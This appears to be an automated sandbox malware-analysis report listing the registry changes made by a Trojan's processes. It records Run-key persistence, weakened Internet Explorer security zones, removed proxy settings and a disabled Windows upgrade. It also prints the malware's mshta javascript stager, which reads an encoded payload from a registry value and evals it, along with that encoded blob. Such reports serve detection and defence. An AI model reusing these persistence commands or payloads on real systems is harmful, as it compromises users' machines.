"Seed" = "F7 87 43 FE 6A 9E 0A DC 56 E2 5B FB F1 6D D9 A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "199"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "200"
"Microsoft.PowerShell.Commands.Utility.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "78 BB 8F 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeIDFor64BitProcesses" = "178"
"StoreChangeIDFor32BitProcesses" = "199"
The process PSCustomSetupUtil.exe:3224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 1B B7 08 25 1C 8C DF 2D 7A E7 F4 F9 56 FE AC"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Commands.Utility, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "190"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL" = "F2 7F EE 96 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "191"
"StoreChangeIDFor64BitProcesses" = "169"
"StoreChangeIDFor32BitProcesses" = "190"
The process PSCustomSetupUtil.exe:3984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 FB D3 DA 07 EB 27 54 03 B0 CB 62 D9 B8 5E 70"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "22 C7 3D 99 CA AB D1 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "203"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "204"
"StoreChangeIDFor64BitProcesses" = "182"
"StoreChangeIDFor32BitProcesses" = "203"
The process PSCustomSetupUtil.exe:3848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 82 C9 7F 07 50 C1 DC 02 0B 41 B3 C8 38 A8 D2"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.Security.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "CC A5 BA 98 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Security.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "201"
"StoreChangeIDFor64BitProcesses" = "179"
"StoreChangeIDFor32BitProcesses" = "200"
The process regsvr32.exe:3056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7" = "1D709C0DD4691288F7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD" = "8D2E520561B1C21CD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 AB 23 78 63 4B DC 99 40 F3 EE 97 07 E1 46 59"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies the IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKLM\SOFTWARE\08D9199AFCC469E5F79B]
"1D709C0DD4691288F7"
[HKLM\SOFTWARE\A51EADA45C528B6F6B]
"8D2E520561B1C21CD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
The process regsvr32.exe:2644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 88 E9 A0 DA EE 28 71 CC FF 4F AD A0 A4 07 9D"
The process regsvr32.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:qqqKk5V2ak=gr;d36Y=new ActiveXObject(WScript.Shell);RDjMp8Tw=7jV6cXJTk5;o53JnY=d36Y.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);PSfU04tT=7R;eval(o53JnY);UBTG6t3ih=Xuhqxc;P"
[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"
[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "863"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKCU\Software\Classes\.54crF]
"(Default)" = "YoQ1"
[HKCU\Software\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\obuwa\obuwa.exe"
"5232108f" = "/ÒÜ|›² ‰n_j'ÃÂÂù·ÃÂÂA¹Š=Ã’@úâ€Â¦ã¤)[ï…EÂÂÂÃÂÂÂÂÂplpÂÂÂ'½xÀPÃÂÂ&9åú„r‡BÂÂÂH‘ÃÂÂøcEâ€â€Âi¬ôŽ›ÂÂÂ@ Ë(¸)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKCU\Software\e307dfcb0a]
"f4ea4294" = "863"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\e307dfcb0a]
"5119f545" = "U7yeyZIyFNDURLMKACVRm=NOXUzHHZenqYIpUsbdKypsnVgUU1dhGtSNAuXNqW9YwoQNkvNoDyGwHjaD8vCOarBRNS4Emtzd3lCzVHeFLCo6MQKYd9fe0L73rGNfLiFV5ilGXi0MEKno1AIq;RGrGI0XcrfQvThdeeAa=Mx2oGPjrQl4tgRtSWF14fTmuv19y0FL3V8DrgGuvDHSgQn2lbGf4TXW6IvCejGyZ1wKVbO3f55fCMsYnGyPb3ITu7lMA5xtodhh2nDUpagaZNCpYJ9TiBNBX;LHSaeZeemJZjB4ylJcGEt=W95EvZFE5o2ZTbFPFxk9IMZK1hpABlsMJvEBM2l22l6lHrkqJtI8ae3jWJ5IBkq49QWIJN7uHIhw8rISLCeSEfoQXyGmKjzSHlEpdmEy4tDhepdS2Yiw3qTF2lD7iDLTfOy4T;mhANhUCGdgkGyuPiOLbu1T=ruy3VTEcJBa9w59M4WWfU0AuPV;PhbMcLBdg7TMdwDnRJY=PBJGZc4CJiP8d68WnZC1AzlED2QBzSQhaEHHJD36Pkx5iwpnsFJ4JaIvHX3lqcNDVUkUmZAuWwYfQ1FlpRnVOE6TGKJrRzUhqbP7vsjM2AyhKPjXdusvl;gza0pJgPHDmWXTxFRJoMtWTJ=MzhBJitRRHE6H3LojkyKF5GUYKyqXc2Ik9NBDKajVav2YIvJuAttj3mB;NCJHQHwEjp0ZqNFXaTqvmWG=SUCwHDaEo7f29rQjQfPEkLXG7Q1;El95C=37771B1C194845203C197030142114471B160F1E35261A72416429426714271408290F3368163B1A617D68770E23295375273C7C6E4C185769250D1F777110002C77002D015B23150776026D21420A1125080E3A0F6E126F3824335544755724011177141B60661518005B225A2538252001020A121F292P"
"0494a3ce" = "1463001449"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "40 76 61 AD 3F 7D 6B 47 91 BC A6 E5 0D DC 5B 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\e307dfcb0a]
"5232108f" = "/ÒÜ|›² ‰n_j'ÃÂÂù·ÃÂÂA¹Š=Ã’@úâ€Â¦ã¤)[ï…EÂÂÂÃÂÂÂÂÂplpÂÂÂ'½xÀPÃÂÂ&9åú„r‡BÂÂÂH‘ÃÂÂøcEâ€â€Âi¬ôŽ›ÂÂÂ@ Ë(¸)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"
[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"
[HKCU\Software\e307dfcb0a]
"52b1e748" = "CB153804BB053A10"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKCU\Software\Classes\YoQ1\shell\open\command]
"(Default)" = "mshta javascript:UPH9r6uZF=A4DSokG;FK87=new ActiveXObject(WScript.Shell);RSmW5p7s=f2nwkSu7f;dox2H=FK87.RegRead(HKCU\\software\\e307dfcb0a\\5119f545);LEsIMPGA1=94o2U;eval(dox2H);qz23cVjgqX=4xWUYT;"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"
[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1463001449"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
The Trojan modifies the IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies the IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies the IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\obuwa\obuwa.exeP"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
The Trojan disables automatic startup of the application by deleting the autorun value under the following key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
The process regsvr32.exe:2952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 52 80 99 FC 92 3A 9B A6 31 A1 17 42 9D 7A 79"
The process summit_sharma.exe:2672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 76 10 06 C9 D9 ED 05 17 15 37 FA 81 58 84 D5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 07-04-2016_hwopt_3.0.10-1.exe:1632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 85 14 81 69 93 28 09 58 35 D8 1D 56 FC 30 DD"
The process XBLive.exe:3008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA DA BB 10 01 15 28 47 CB 4D 8C FE 2A 37 78 E3"
[HKLM\SOFTWARE\Microsoft\DirectX]
"EID" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
The process InstallationStatsUploder_12052016001648.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 3E 8B 28 0B 7E 16 88 E4 2F 0A 2B 2F 2B 39 83"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1488 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 BE 15 85 1C ED 98 47 AD 25 69 09 FE A8 0E FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 57 29 8F 58 8A 00 55 36 D7 C0 0A D4 7F 9D 9D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 80 AE 91 25 C4 94 A7 F5 AE CA DA C7 8A 50 2C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E F0 A1 9E E7 DF 95 8B 3B 15 55 3D 63 06 51 57"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 60 C3 23 39 A9 43 EB F1 2F B5 12 D9 89 82 55"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 95 32 27 9E 61 DB 73 3F 94 CB 5B 2A 01 64 B0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
